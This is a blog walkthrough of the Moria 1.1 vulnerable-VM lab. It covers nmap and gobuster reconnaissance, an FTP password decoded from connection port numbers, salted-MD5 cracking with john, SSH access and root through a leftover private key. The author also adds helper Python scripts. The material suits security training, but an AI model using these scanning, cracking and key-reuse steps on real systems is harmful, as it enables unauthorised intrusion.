Moria 1.1 Target Machine

Information Gathering

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.154
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 03:20 EDT
Nmap scan report for 192.1.1.154
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:09:B3:87 (VMware)

Ports 21, 22, and 80 are open.

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 192.1.1.154
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 03:21 EDT
Nmap scan report for 192.1.1.154
Host is up (0.00028s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
| 256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_ 256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Gates of Moria
MAC Address: 00:0C:29:09:B3:87 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

Port 21 runs vsftpd 2.0.8, the OS is CentOS, and port 80 runs Apache/2.4.6 (CentOS) PHP/5.4.16.

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo nmap --script=vuln -p21,22,80 192.1.1.154
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 03:22 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.1.1.154
Host is up (0.00028s latency).

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /w/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:09:B3:87 (VMware)

Found the /w/ folder.

Directory Brute-Forcing

Let's try directory brute-forcing.

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo gobuster dir -u http://192.1.1.154/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,sql,tar,php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.154/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: txt,html,sql,tar,php
[+] Timeout: 10s
===============================================================
2023/09/18 03:25:39 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 85]
/.html (Status: 403) [Size: 207]
/w (Status: 301) [Size: 229] [--> http://192.1.1.154/w/]
/.html (Status: 403) [Size: 207]
Progress: 1321206 / 1323366 (99.84%)
===============================================================
2023/09/18 03:27:46 Finished
===============================================================

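Apart from /w, no more valuable directories were found. Let's look at the web interface first.

Web Penetration

The site root is an image, the site title is Gates of Moria, and the image is named moria.

Search Google directly for Gates of Moria.

I briefly went through the background story in the first link. The gist is that this gate has a password. Gandalf could not work out the password at first, and then, by coincidence during a conversation, he realized the password was Mellon, which means friend. Note down Mellon for now.

It is a directory that you can keep clicking into, and clicking through to the end gives content like this.

After refreshing a few times, I found that each refresh returns a random line, with some repeats along the way. I collected them: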

"Is this the end?" 
Nain:"Will the human get the message?"
Dain:"Is that human deaf? Why is it not listening?"
"Knock knock"
Fundin:"That human will never save us!"
Ori:"Will anyone hear us?"
"We will die here.."
Telchar to Thrain:"That human is slow, don't give up yet"
Maeglin:"The Balrog is not around, hurry!"
Oin:"Stop knocking!"
"Eru! Save us!"
"Too loud!"
Balin: "Be quiet, the Balrog will hear you!"

After looking at it for a long time I still couldn't figure out what it meant, but at least I collected a username dictionary.

Dain
Fundin
Ori
Telchar
Thrain
Maeglin
Oin
Balin
Balrog
gandalf
Gandalf
Moria

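Brute-forcing FTP with Mellon as the password failed, so I had to look at a write-up. The approach here feels a bit like a CTF: it turns out you have to capture packets with Wireshark.

The capture shows that the site periodically sends connections to ports 77, 101, 108, 108, 111, 110, 54, 57 on the attacking machine.

Here you need to realize that these port numbers correspond one-to-one to ASCII codes (this is really convoluted, I truly would not have thought of it), which gives Mellon69. It looks similar to the password obtained earlier, so it may be the FTP password. When I tried brute-forcing again, I found that the target seems to have an anti-brute-force mechanism, and I seemed to have been banned.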
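
The port-to-ASCII reading described above can be checked mechanically from a text capture. This is an added example, not part of the original write-up: the `tcpdump -nn` lines are constructed, the attacker-side address 192.1.1.128 is an assumption, and the function names are hypothetical. It keeps only SYNs from the target, collapses retransmits, and reduces the repeating stream to one cycle before decoding.

```python
import re

# Constructed `tcpdump -nn` text, not the original capture. 192.1.1.128 is an
# assumed address for the attacking machine; 192.1.1.154 is the target.
CAPTURE = """\
03:40:01.000101 IP 192.1.1.154.51000 > 192.1.1.128.77: Flags [S], seq 1, length 0
03:40:01.000150 IP 192.1.1.128.77 > 192.1.1.154.51000: Flags [R.], seq 0, ack 2, length 0
03:40:02.000101 IP 192.1.1.154.51002 > 192.1.1.128.101: Flags [S], seq 1, length 0
03:40:03.000101 IP 192.1.1.154.51004 > 192.1.1.128.108: Flags [S], seq 1, length 0
03:40:04.000101 IP 192.1.1.154.51006 > 192.1.1.128.108: Flags [S], seq 1, length 0
03:40:04.500000 IP 192.1.1.1.40000 > 192.1.1.128.443: Flags [S], seq 9, length 0
03:40:05.000101 IP 192.1.1.154.51008 > 192.1.1.128.111: Flags [S], seq 1, length 0
03:40:06.000101 IP 192.1.1.154.51010 > 192.1.1.128.110: Flags [S], seq 1, length 0
03:40:07.000101 IP 192.1.1.154.51012 > 192.1.1.128.54: Flags [S], seq 1, length 0
03:40:08.000101 IP 192.1.1.154.51012 > 192.1.1.128.54: Flags [S], seq 1, length 0
03:40:09.000101 IP 192.1.1.154.51014 > 192.1.1.128.57: Flags [S], seq 1, length 0
03:41:01.000101 IP 192.1.1.154.51016 > 192.1.1.128.77: Flags [S], seq 1, length 0
03:41:02.000101 IP 192.1.1.154.51018 > 192.1.1.128.101: Flags [S], seq 1, length 0
"""

SYN = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[S\]")

def syn_ports(text, src, dst):
    """Destination ports of SYNs from src to dst, in order, retransmits collapsed."""
    ports, last = [], None
    for line in text.splitlines():
        m = SYN.search(line)
        if not m or (m.group(1), m.group(3)) != (src, dst):
            continue
        flow = (m.group(2), m.group(4))  # same source and destination port = retransmit
        if flow != last:
            ports.append(int(m.group(4)))
        last = flow
    return ports

def one_cycle(seq):
    """Shortest prefix whose repetition reproduces seq (the sender loops)."""
    for n in range(1, len(seq) + 1):
        if all(seq[i] == seq[i % n] for i in range(len(seq))):
            return seq[:n]
    return seq

def decode(ports):
    """Printable-ASCII ports become characters; anything else is shown as '?'."""
    return "".join(chr(p) if 32 <= p < 127 else "?" for p in ports)

if __name__ == "__main__":
    print(decode(one_cycle(syn_ports(CAPTURE, "192.1.1.154", "192.1.1.128"))))
```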

FTP Login

Trying them manually one by one, I found that Balrog:Mellon69 is the correct FTP login credential.

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ ftp 192.1.1.154
Connected to 192.1.1.154.
220 Welcome Balrog!
Name (192.1.1.154:kali): Balrog
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -alih
229 Entering Extended Passive Mode (|||7459|).
150 Here comes the directory listing.
drwxr-x--- 2 0 1001 27 Mar 14 2017 .
dr-xr-xr-x 18 0 0 258 Mar 14 2017 ..
-rw-r--r-- 1 0 0 1 Apr 28 2017 .bash_history
226 Directory send OK.
ftp> get .bash_history
local: .bash_history remote: .bash_history
229 Entering Extended Passive Mode (|||26556|).
550 Permission denied.
ftp> pwd
Remote directory: /prison

It seems other directories are accessible, so let's try the web directory and the home directory.

ftp> cd /home
550 Failed to change directory.
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls -liah
229 Entering Extended Passive Mode (|||15279|).
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 89 Mar 14 2017 .
drwxr-xr-x 4 0 0 33 Nov 14 2016 ..
drwxr-xr-x 2 0 0 23 Mar 12 2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r-------- 1 48 48 85 Mar 12 2017 index.php
-r-------- 1 48 48 161595 Mar 11 2017 moria.jpg
drwxr-xr-x 3 0 0 15 Mar 12 2017 w
ftp> cd QlVraKW4fbIkXau9zkAPNGzviT3UKntl
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||57806|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1672 Mar 12 2017 index.php
226 Directory send OK.
ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||30599|).
550 Permission denied.

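Found the QlVraKW4fbIkXau9zkAPNGzviT3UKntl directory, but the file in it cannot be downloaded locally, so let's visit it through the web page.

The web page appears to contain password hashes, and a comment in the page source gives the salt values.

The next task is to use a tool to brute-force the passwords that correspond to the hashes.

Cracking Salted Hashes

I originally wanted to use hashcat, but it doesn't seem to support this MD5(MD5(Password).Salt) mode, so let's look at john. Searching Google for john salt md5, the first link gave the usage and the hash file format.

Some simple data processing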

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ awk 'FNR==NR {arr[FNR]=$0; next} {print arr[FNR],$0}' salt sshloginpasswd
6MAp84 c2d8960157fc8540f6d5d66594e165e0
bQkChe 727a279d913fba677c490102b135e51e
HnqeN4 8c3c3152a5c64ffb683d78efc3520114
e5ad5s 6ba94d6322f53f30aca4f34960203703
g9Wxv7 c789ec9fae1cd07adfc02930a39486a1
HCCsxP fec21f5c7dcf8e5e54537cfda92df5fe
cC5nTr 6a113db1fd25c5501ec3a5936d817c29
h8spZR 7db5040c351237e8332bfbba757a1019
tb9AWe dd272382909a4f51163c77da6356cc6f

After writing this to a file, adjust it again with awk, adding a $ when printing.

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo john --format=dynamic='md5(md5($p).$s)' --wordlist=/usr/share/wordlists/rockyou.txt hashuserpass
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic=md5(md5($p).$s) [256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
flower (?)
warrior (?)
spanky (?)
rainbow (?)
abcdef (?)
fuckoff (?)
darkness (?)
magic (?)
hunter2 (?)
9g 0:00:00:00 DONE (2023-09-18 08:26) 450.0g/s 672000p/s 2016Kc/s 2016KC/s chulita..waiting
Use the "--show --format=dynamic=md5(md5($p).$s)" options to display all of the cracked passwords reliably
Session completed.
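
john prints `(?)` for every result above because the input lines carry no username field, so the output does not say which row each password belongs to. The following added example (not from the original write-up) spells out the `md5(md5($p).$s)` construction, converts `salt digest` rows into `digest$salt` lines (the layout is an assumption inferred from the "add a $" remark), and re-attributes recovered passwords to their rows. Function names are hypothetical and the sample rows are constructed.

```python
import hashlib

def dynamic_md5(password, salt):
    """md5(md5($p).$s): inner digest as 32 lowercase hex chars, salt appended, hashed again."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()

def john_lines(rows):
    """Convert 'salt digest' rows (the awk output layout) into 'digest$salt' lines."""
    lines = []
    for row in rows.splitlines():
        fields = row.split()
        if len(fields) != 2:
            continue  # skip blank or malformed rows
        salt, digest = fields
        if len(digest) != 32 or set(digest) - set("0123456789abcdef"):
            raise ValueError("not an MD5 hex digest: " + digest)
        lines.append(digest + "$" + salt)
    return lines

def attribute(lines, recovered):
    """Map each 'digest$salt' line to the recovered password that reproduces it, or None."""
    result = {}
    for line in lines:
        digest, salt = line.split("$", 1)
        result[line] = next((p for p in recovered if dynamic_md5(p, salt) == digest), None)
    return result

# Constructed rows: salts and passwords invented for this example, not the page's data.
SAMPLE = [("aB3dE9", "example-one"), ("Zx81Qw", "example-two")]
ROWS = "\n".join(s + " " + dynamic_md5(p, s) for s, p in SAMPLE)

if __name__ == "__main__":
    found = attribute(john_lines(ROWS), ["example-two", "example-one", "unused"])
    for line, password in found.items():
        print(line, "->", password)
```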

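When brute-forcing with hydra I again ran into what was probably an IP ban. In the end, trying manually one at a time, I found that ori:spanky is the SSH login credential.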

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ ssh Ori@192.1.1.154
Ori@192.1.1.154's password:
Last login: Sun Mar 12 22:57:09 2017
-bash-4.2$ whoami
Ori
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
-bash-4.2$ uname -a
Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-bash-4.2$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:09:b3:87 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.154/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1400sec preferred_lft 1400sec
inet6 fe80::deef:db78:6f77:ebdf/64 scope link
valid_lft forever preferred_lft forever
-bash-4.2$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for Ori:
Sorry, user Ori may not run sudo on Moria.
-bash-4.2$ echo $SHELL
/bin/bash
-bash-4.2$ pwd
/home/Ori
-bash-4.2$ ls -alih
total 8.0K
161138 drwx------ 3 Ori notBalrog 55 Mar 12 2017 .
50331740 drwxr-x---. 4 root notBalrog 32 Mar 14 2017 ..
275393 -rw------- 1 Ori notBalrog 1 Mar 14 2017 .bash_history
31082 -rw-r--r-- 1 root root 225 Mar 13 2017 poem.txt
50614599 drwx------ 2 Ori notBalrog 57 Mar 12 2017 .ssh
-bash-4.2$ cat poem.txt
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by.

PS: Moria will not fall!
-bash-4.2$ cat .bash_history

Login succeeded. There is a poem.txt in the home directory; I didn't really understand it.

-bash-4.2$ ls -liah /etc/passwd /etc/shadow /etc/crontab
16865300 -rw-r--r-- 1 root root 450 Mar 11 2017 /etc/crontab
16784990 -rw-r--r-- 1 root root 1.5K Mar 14 2017 /etc/passwd
17556984 ---------- 1 root root 1.2K Apr 28 2017 /etc/shadow
-bash-4.2$ ls /home
abatchy Ori
-bash-4.2$ cd /home/abatchy/
-bash: cd: /home/abatchy/: Permission denied

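I can't get into the other user's home directory. I also tried switching users manually with the passwords collected earlier, which also failed.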

-bash-4.2$ find / -type f -perm -04000 -ls 2>/dev/null
50468854 24 -rws--x--x 1 root root 23960 Nov 5 2016 /usr/bin/chfn
50458347 64 -rwsr-xr-x 1 root root 64240 Nov 5 2016 /usr/bin/chage
50468776 80 -rwsr-xr-x 1 root root 78216 Nov 5 2016 /usr/bin/gpasswd
50468778 44 -rwsr-xr-x 1 root root 41776 Nov 5 2016 /usr/bin/newgrp
50468856 24 -rws--x--x 1 root root 23872 Nov 5 2016 /usr/bin/chsh
50591427 128 ---s--x--x 1 root root 130768 Dec 6 2016 /usr/bin/sudo
50468888 44 -rwsr-xr-x 1 root root 44232 Nov 5 2016 /usr/bin/mount
50468935 32 -rwsr-xr-x 1 root root 32088 Nov 5 2016 /usr/bin/su
50468939 32 -rwsr-xr-x 1 root root 31968 Nov 5 2016 /usr/bin/umount
50654074 2356 -rwsr-xr-x 1 root root 2409560 Nov 5 2016 /usr/bin/Xorg
50495460 60 -rwsr-xr-x 1 root root 57552 Mar 31 2016 /usr/bin/crontab
50339027 28 -rwsr-xr-x 1 root root 27680 Mar 2 2017 /usr/bin/pkexec
50591210 28 -rwsr-xr-x 1 root root 27832 Jun 10 2014 /usr/bin/passwd
50341723 32 -rwsr-xr-x 1 root root 32008 Nov 5 2016 /usr/bin/fusermount
161386 12 -rwsr-xr-x 1 root root 11224 Nov 5 2016 /usr/sbin/pam_timestamp_check
161390 36 -rwsr-xr-x 1 root root 36280 Nov 5 2016 /usr/sbin/unix_chkpwd
288837 12 -rwsr-xr-x 1 root root 11296 Nov 5 2016 /usr/sbin/usernetctl
33705013 16 -rwsr-xr-x 1 root root 15432 Mar 2 2017 /usr/lib/polkit-1/polkit-agent-helper-1
267781 312 -rwsr-x--- 1 root dbus 318424 Nov 6 2016 /usr/lib64/dbus-1/dbus-daemon-launch-helper

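No luck with the SUID files either.

Privilege Escalation via Private Key Login

Use linpeas to collect information. I found that I had forgotten the .ssh folder.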

-bash-4.2$ cd .ssh
-bash-4.2$ ls
id_rsa id_rsa.pub known_hosts
-bash-4.2$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
-bash-4.2$ ls
id_rsa id_rsa.pub known_hosts
-bash-4.2$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison
-bash-4.2$ cat known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=

The 127.0.0.1 entry in known_hosts feels rather odd.

First download the private key locally and try logging in with it.

┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ ssh -i id_rsa ori@192.1.1.154 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa
ori@192.1.1.154's password:

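It still asks me for a password, which I don't quite understand. Since known_hosts contains the local address, try logging in from the target itself.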

-bash-4.2$ ssh -i id_rsa ori@127.0.0.1
ori@127.0.0.1's password:

-bash-4.2$ ls /home
abatchy Ori
-bash-4.2$ ssh -i id_rsa abatchy@127.0.0.1
abatchy@127.0.0.1's password:

-bash-4.2$ ssh -i id_rsa root@127.0.0.1
Last login: Wed Sep 20 01:58:48 2023 from 127.0.0.1

I didn't expect it to actually be root's private key file.

[root@Moria ~]# whoami
root
[root@Moria ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:09:b3:87 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.154/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1745sec preferred_lft 1745sec
inet6 fe80::deef:db78:6f77:ebdf/64 scope link
valid_lft forever preferred_lft forever
[root@Moria ~]# uname -a
Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[root@Moria ~]# cd /rot
-bash: cd: /rot: No such file or directory
[root@Moria ~]# cd /root
[root@Moria ~]# ls
0 anaconda-ks.cfg Desktop flag.txt hosts
[root@Moria ~]# cat flag.txt
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.”

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy

https://i3eg1nner.github.io/2023/09/ef22d903c06e.html
Author: I3eg1nner
Published: September 18, 2023